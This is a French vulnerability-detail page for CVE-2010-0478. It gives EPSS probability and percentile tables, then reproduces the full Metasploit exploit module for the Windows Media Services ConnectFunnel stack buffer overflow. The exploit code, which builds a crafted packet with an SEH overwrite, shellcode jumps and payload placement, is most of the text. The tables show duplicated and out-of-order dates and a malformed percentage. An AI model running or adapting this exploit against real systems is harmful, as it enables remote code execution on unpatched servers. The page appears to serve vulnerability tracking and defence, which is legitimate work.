CVE-2010-0478 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	86.47%	–	–
2023-03-12	–	–	–	97.25%	–
2023-03-19	–	–	–	97.27%	–
2023-05-07	–	–	–	97.21%	–
2023-06-18	–	–	–	97.24%	–
2023-07-30	–	–	–	97.23%	–
2023-09-10	–	–	–	97.06%	–
2023-10-29	–	–	–	96.8%	–
2023-12-10	–	–	–	96.89%	–
2024-01-21	–	–	–	96.94%	–
2024-06-02	–	–	–	96.91%	–
2024-09-01	–	–	–	96.96%	–
2024-11-24	–	–	–	96.92%	–
2024-12-22	–	–	–	96.88%	–
2025-02-16	–	–	–	96.71%	–
2025-01-19	–	–	–	96.88%	–
2025-02-16	–	–	–	96.71%	–
2025-03-18	–	–	–	–	78.68%
2025-03-18	–	–	–	–	78.68,%

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Date	Percentile
2022-02-06	1%
2023-03-12	1%
2023-03-19	1%
2023-05-07	1%
2023-06-18	1%
2023-07-30	1%
2023-09-10	1%
2023-10-29	1%
2023-12-10	1%
2024-01-21	1%
2024-06-02	1%
2024-09-01	1%
2024-11-24	1%
2024-12-22	1%
2025-02-16	1%
2025-01-19	1%
2025-02-16	1%
2025-03-18	99%
2025-03-18	99%

## # $Id: ms10_025_wmss_connect_funnel.rb 9166 2010-04-28 00:48:00Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'Windows Media Services ConnectFunnel Stack Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in the Windows Media Unicast Service version 4.1.0.3930 (NUMS.exe). By sending a specially crafted FunnelConnect request, an attacker can execute arbitrary code under the "NetShowServices" user account. Windows Media Services 4.1 ships with Windows 2000 Server, but is not installed by default. NOTE: This service does NOT restart automatically. Successful, as well as unsuccessful exploitation attempts will kill the service which prevents additional attempts. }, 'Author' => 'jduck', 'License' => MSF_LICENSE, 'Version' => '$Revision: 9166 $', 'References' => [ [ 'CVE', '2010-0478' ], [ 'OSVDB', '63726' ], [ 'MSB', 'MS10-025' ], [ 'URL', 'https://www.lexsi.com/abonnes/labs/adviso-cve-2010-0478.txt' ] ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 600, 'BadChars' => "\x00\x5c", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'Windows 2000 Pro SP4 English', { # Unpatched: # SEH handler offset is 840 # Stack return is at 652 # "Patched": # SEH handler offset is 832 'Offset' => 840, 'SEHOffsets' => [ 832, 840 ], 'EIPOffset' => 652+3, 'Ret' => 0x75022ac4 # p/p/r in ws2help.dll } ], ], 'Privileged' => false, 'DisclosureDate' => 'Apr 13 2010', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(1755) ], self.class) end def exploit @pkts = 0 cmd_buf = '' # LinkViewerToMacConnect subscriber = "NSPlayer/4.1.0.3928; {68c0a090-8797-11d2-a2b3-00a0c9b60551}" #subscriber = "NSPlayer/7.0.0.1956; {}; Host: The.Host.Net" #subscriber = "Spooooon!" subscriber << "\x00" subscriber = Rex::Text.to_unicode(subscriber) cmd_buf << make_command(0x30001, subscriber) # LinkViewerToMacConnectFunnel name = '' name << "\\\\" name << rand_text((target['Offset'] + 4 + 5) / 2) name << "\\" name << "\x00" # Convert it to Unicode.. name = Rex::Text.to_unicode(name) stuff = Rex::Text.pattern_create((target['Offset'] + 4 + 5) + 4) stuff.slice!(0,4) name[4,stuff.length] = stuff # Insert the payload.. name[4,payload.encoded.length] = payload.encoded # Build the SEH frame that leads to the payload... target['SEHOffsets'].each { |off| seh = '' case off when 832 code = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-652").encode_string code << rand_text(8 - code.length) name[off-8,code.length] = code seh << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-8").encode_string seh << rand_text(2) seh << [target.ret].pack('V') when 840 seh << generate_seh_record(target.ret) asm = "add edi, 0x04\njmp edi" seh << Metasm::Shellcode.assemble(Metasm::Ia32.new, asm).encode_string end name[off,seh.length] = seh } # Make sure the return address points at an invalid address off = target['EIPOffset'] name[off,1] = [0x80 + rand(0x7f)].pack('C') # Add it to the command buffer.. cmd_buf << make_command(0x30002, name) # Build the TcpMessageHeader .. pkt = make_tcpmsghdr(cmd_buf) # Handle the transacation.. connect print_status("Sending crafy commands (#{pkt.length} bytes) ...") sock.put(pkt) handler disconnect end # # Create a TcpMessageHeader from the supplied data # def make_tcpmsghdr(data) len = data.length # The server doesn't like packets that are bigger... raise RuntimeError, 'Length too big' if (len > 0x1000) len /= 8 # Pack the pieces in ... pkt = [ 1,0,0,0, # rep, ver, verMinor, pad 0xb00bface, # session id (nice) data.length + 16, # msg len 0x20534d4d, # seal ("MMS ") len + 2, # chunkCount @pkts, 0, # seq, MBZ rand(0xffffffff),rand(0xffffffff) # timeSent -- w/e ].pack('CCCCVVVVvvVV') # Add the data pkt << data # Pad it to 8 bytes... left = data.length % 8 pkt << ("\x00" * (8 - left)) if (left > 0) pkt end # # Create a command packet # def make_command(msg_id, extra) # Two opcodes, get handled differently.. case msg_id when 0x30001 data = [0xf0f0f0f0,0x0004000b,0x0003001c].pack('VVV') when 0x30002 data = [0xf0f0f0f1,0xffffffff,0,0x989680,0x00000002].pack('VVVVV') end # Put some data on... data << extra # Pad it to 8 bytes... left = data.length % 8 data << ("\x00" * (8 - left)) if (left > 0) # Combine the pieces.. pkt = [ (data.length / 8) + 1, # chunkLen msg_id # msg ID ].pack('VV') pkt << data pkt end end